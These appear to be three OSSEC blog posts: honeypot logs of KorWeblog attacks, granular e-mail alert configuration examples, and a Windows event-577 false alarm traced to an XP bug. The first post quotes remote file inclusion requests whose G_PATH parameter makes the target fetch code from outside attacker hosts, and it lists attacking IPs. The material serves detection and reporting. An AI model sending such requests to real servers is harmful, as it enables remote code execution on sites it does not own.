bookmark_borderHammered by web attacks (KorWeblog)

Some of my web honeypots are being hammered by attacks against KorWeblog. If fact, even my real systems are received a lot of these too.. It looks like they are trying to exploit an old vulnerability (from 2005), which sounds odd to me.

Example of alert from ossec:

OSSEC HIDS Notification.
2007 Jun 27 17:07:30

Received From: xx->/var/log/httpd/xx.access.log
Rule: 31106 fired (level 12) -> “A web attack returned code 200 (success).”
Portion of the log(s):

8.10.120.85 – – [27/Jun/2007:17:07:29 -0300] “GET /install/index.php?lng=../../include/main.inc&G_PATH=http://nicksom2d.sytes.net/ex/echo? HTTP/1.1″ 200 6349 “-” “libwww-perl/5.805″

Just one honeypot (yes, one) in the last few days was “attacked” by the following IPs (25 different):

189.1.168.118
200.193.146.100
200.219.150.6
202.123.27.136
203.55.214.70
207.150.188.50
207.226.179.98
209.216.205.81
210.188.204.198
211.247.239.10
213.194.149.130
216.7.185.31
217.170.66.240
218.228.196.88
218.239.223.225
221.127.101.45
62.193.237.43
62.75.163.196
65.98.58.2
72.232.219.205
8.10.120.85
83.103.57.13
83.217.84.88
85.125.233.222
89.110.144.202

The logs look all the same:

200.193.146.100 – – [26/Jun/2007:16:37:37 -0300] “GET /*install/index.php?lng=../../include/main.inc&G_PATH=http://www.thiaguinho.net/id.txt? HTTP/1.1″ 200 6351 “-” “libwww-perl/5.79″
8.10.120.85 – – [27/Jun/2007:17:07:29 -0300] “GET /install/index.php?lng=../../include/main.inc&G_PATH=http://nicksom2d.sytes.net/ex/echo? HTTP/1.1″ 200 6349 “-” “libwww-perl/5.805″

I posted a few of the sites that were found at the WebAttacks Links in the ossec wiki.

bookmark_borderGranular e-mail alerting

One of the most popular feature requests for ossec that I received lately was the availability of granular e-mail alerting options. Well, if you have been waiting for it, it is now available to be used… Just try our first beta release of version 1.2 and let us know how it goes.

Here are some examples of what you can do:

If you want to e-mail xx@y.z for every event in the group syslog you can add the following to ossec:

  <email_alerts>
   <email_to>xx@y.z</email_to>
   <group>syslog</group>
 </email_alerts>

To e-mail (sms format) aa@y.z for every event with severity higher than 10 (Note that the SMS format is not grouped, so the e-mail is sent immediately):

  <email_alerts>
   <email_to>aa@y.z</email_to>
   <level>10</level>
   <format>sms</format>
 </email_alerts>

To e-mail bb@y.z for every event from rule 123 or rule 124:

 <email_alerts>
   <email_to>bb@y.z</email_to>
   <rule_id>123, 124</rule_id>
 </email_alerts>

To e-mail cc@y.z for every event with severity higher than 12, from agent qwert, without any delay (immediately):

 <email_alerts>
   <email_to>cc@y.z</email_to>
   <level>12</level>
   <event_location>qwerty</event_location>
   <do_not_delay />
 </email_alerts<

You just need to tweak it for you own needs. Send any questions to our mailing list or here in the comments.

Download it from here (always use the latest package available): beta snapshots.

bookmark_borderMultiple 577 entries in the eventlog (from Windows)

I was monitoring the Windows logs from a client network and I noticed that a few boxes were constantly generating audit failure 577 events:

WinEvtLog: Security: AUDIT_FAILURE(577): Security: xxx: XX-HQ: YY-HQ: Privileged Service Called: Server: Security Primary User Name: abc Primary Domain: XX-HQ Privileges: SeIncreaseBasePriorityPrivilege

To make it worse, ossec was alerting me by e-mail every time of “Rule: 18151 fired (level 10) -> “Multiple failed attempts to perform a privileged operation by the same user.””. My initial thought was that these machines were infected by spyware or something similar, so I went investigating them. I didn’t want to disable this rule on ossec, because it is fairly important for “normal” systems.

After some research, I found out that their problem was having Windows XP installed 🙂 (without the latest Service pack). Basically there is a bug on Windows that causes this behavior.. If you ever experience this problem, check the following link: http://support.microsoft.com/kb/831905 and make sure to install the latest updates.

.